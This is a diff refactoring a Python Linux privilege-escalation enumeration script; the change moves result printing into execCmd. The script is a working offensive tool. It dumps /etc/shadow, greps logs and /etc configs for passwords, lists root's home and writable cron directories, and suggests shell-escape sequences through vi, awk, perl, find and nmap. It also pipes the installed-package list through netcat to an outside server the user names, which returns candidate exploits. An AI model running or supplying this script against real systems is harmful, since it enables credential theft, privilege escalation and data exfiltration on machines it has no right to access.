skipped 56 lines 57 57 results = ['[-] failed: {}'.format(e)] 58 58 cmdDict[item]["results"]=results 59 59 60 - return cmdDict 60 + printResults(cmdDict) 61 61 62 62 # print results for each previously executed command, no return value 63 63 def printResults(cmdDict): skipped 8 lines 72 72 return 73 73 74 74 def writeResults(msg, results): 75 - f = open("privcheckout.txt", "a"); 75 + f = open("privcheckout.txt", "a") 76 76 f.write("[+] " + str(len(results)-1) + " " + msg) 77 77 for result in results: 78 78 if result.strip() != "": skipped 11 lines 90 90 "HOSTNAME":{"cmd":"hostname", "msg":"Hostname"} 91 91 } 92 92 93 - sysInfo = execCmd(sysInfo)94 - printResults(sysInfo) 93 + execCmd(sysInfo) 95 94 96 95 # Networking Info 97 96 skipped 7 lines 105 104 "SS":{"cmd":"ss -antup", "msg":"ss"} 106 105 } 107 106 108 - netInfo = execCmd(netInfo)109 - printResults(netInfo) 107 + execCmd(netInfo) 110 108 111 109 # File System Info 112 110 print( "[*] GETTING FILESYSTEM INFO...\n") skipped 2 lines 115 113 "FSTAB":{"cmd":"cat /etc/fstab 2>/dev/null", "msg":"fstab entries"} 116 114 } 117 115 118 - driveInfo = execCmd(driveInfo)119 - printResults(driveInfo) 116 + execCmd(driveInfo) 120 117 121 118 # Scheduled Cron Jobs 122 119 cronInfo = {"CRON":{"cmd":"ls -la /etc/cron* 2>/dev/null", "msg":"Scheduled cron jobs"}, 123 120 "CRONW": {"cmd":"ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null", "msg":"Writable cron dirs"} 124 121 } 125 122 126 - cronInfo = execCmd(cronInfo)127 - printResults(cronInfo) 123 + execCmd(cronInfo) 128 124 129 125 # User Info 130 126 print("\n[*] ENUMERATING USER AND ENVIRONMENTAL INFO...\n") skipped 8 lines 139 135 "LOGGEDIN":{"cmd":"w 2>/dev/null", "msg":"Logged in User Activity"} 140 136 } 141 137 142 - userInfo = execCmd(userInfo)143 - printResults(userInfo) 138 + execCmd(userInfo) 144 139 145 140 if "root" in userInfo["ID"]["results"][0]: 146 141 print("[!] ARE YOU SURE YOU'RE NOT ROOT ALREADY?\n") skipped 8 lines 155 150 "ROOTHOME":{"cmd":"ls -ahlR /root 2>/dev/null", "msg":"Checking if root's home folder is accessible"} 156 151 } 157 152 158 - fdPerms = execCmd(fdPerms) 159 - printResults(fdPerms) 153 + execCmd(fdPerms) 160 154 161 155 pwdFiles = {"LOGPWDS":{"cmd":"find /var/log -name '*.log' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Logs containing keyword 'password'"}, 162 156 "CONFPWDS":{"cmd":"find /etc -name '*.c*' 2>/dev/null | xargs -l10 egrep 'pwd|password' 2>/dev/null", "msg":"Config files containing keyword 'password'"}, 163 157 "SHADOW":{"cmd":"cat /etc/shadow 2>/dev/null", "msg":"Shadow File (Privileged)"} 164 158 } 165 159 166 - pwdFiles = execCmd(pwdFiles)167 - printResults(pwdFiles) 160 + execCmd(pwdFiles) 168 161 169 162 # Processes and Applications 170 163 print("[*] ENUMERATING PROCESSES AND APPLICATIONS...\n") skipped 6 lines 177 170 getAppProc = {"PROCS":{"cmd":"ps aux | awk '{print $1,$2,$9,$10,$11}'", "msg":"Current processes"}, 178 171 "PKGS":{"cmd":getPkgs, "msg":"Installed Packages"}} 179 172 180 - getAppProc = execCmd(getAppProc)181 - printResults(getAppProc) # comment to reduce output 173 + execCmd(getAppProc) 182 174 183 175 otherApps = { "SUDO":{"cmd":"sudo -V | grep version 2>/dev/null", "msg":"Sudo Version (Check out http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)"}, 184 176 "APACHE":{"cmd":"apache2 -v; apache2ctl -M; httpd -v; apachectl -l 2>/dev/null", "msg":"Apache Version and Modules"}, 185 177 "APACHECONF":{"cmd":"cat /etc/apache2/apache2.conf 2>/dev/null", "msg":"Apache Config File"}} 186 178 187 - otherApps = execCmd(otherApps)188 - printResults(otherApps) 179 + execCmd(otherApps) 189 180 190 181 print("[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...\n") 191 182 skipped 41 lines 233 224 print("\n[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...\n") 234 225 235 226 devTools = {"TOOLS":{"cmd":"which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null", "msg":"Installed Tools"}} 236 - devTools = execCmd(devTools)237 - printResults(devTools) 227 + execCmd(devTools) 238 228 239 229 print("[+] Related Shell Escape Sequences...\n") 240 - escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], "perl":["perl -e 'exec \"/bin/bash\";'"], "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], "nmap":["--interactive"]} 230 + 231 + escapeCmd = {"vi":[":!bash", ":set shell=/bin/bash:shell"], 232 + "awk":["awk 'BEGIN {system(\"/bin/bash\")}'"], 233 + "perl":["perl -e 'exec \"/bin/bash\";'"], 234 + "find":["find / -exec /usr/bin/awk 'BEGIN {system(\"/bin/bash\")}' \\;"], 235 + "nmap":["--interactive"]} 236 + 241 237 for cmd in escapeCmd: 242 238 for result in devTools["TOOLS"]["results"]: 243 239 if cmd in result: skipped 7 lines 251 247 port = input("[?] What port is the server using? ") 252 248 print("[ ] Connecting to {}:{}".format(server,port)) 253 249 exploits = {"EXPLOITS":{"cmd":"dpkg -l | tail -n +6 | awk '{{print $2, $3}} END {{print \"\"}}' | nc {} {}".format(server, port), "msg":"Found the following possible exploits"}} 254 - exploits_results = execCmd(exploits) 255 - printResults(exploits) 250 + execCmd(exploits) 256 251 257 252 print("\n[+] Finished") 258 253 print(bigline) skipped 1 lines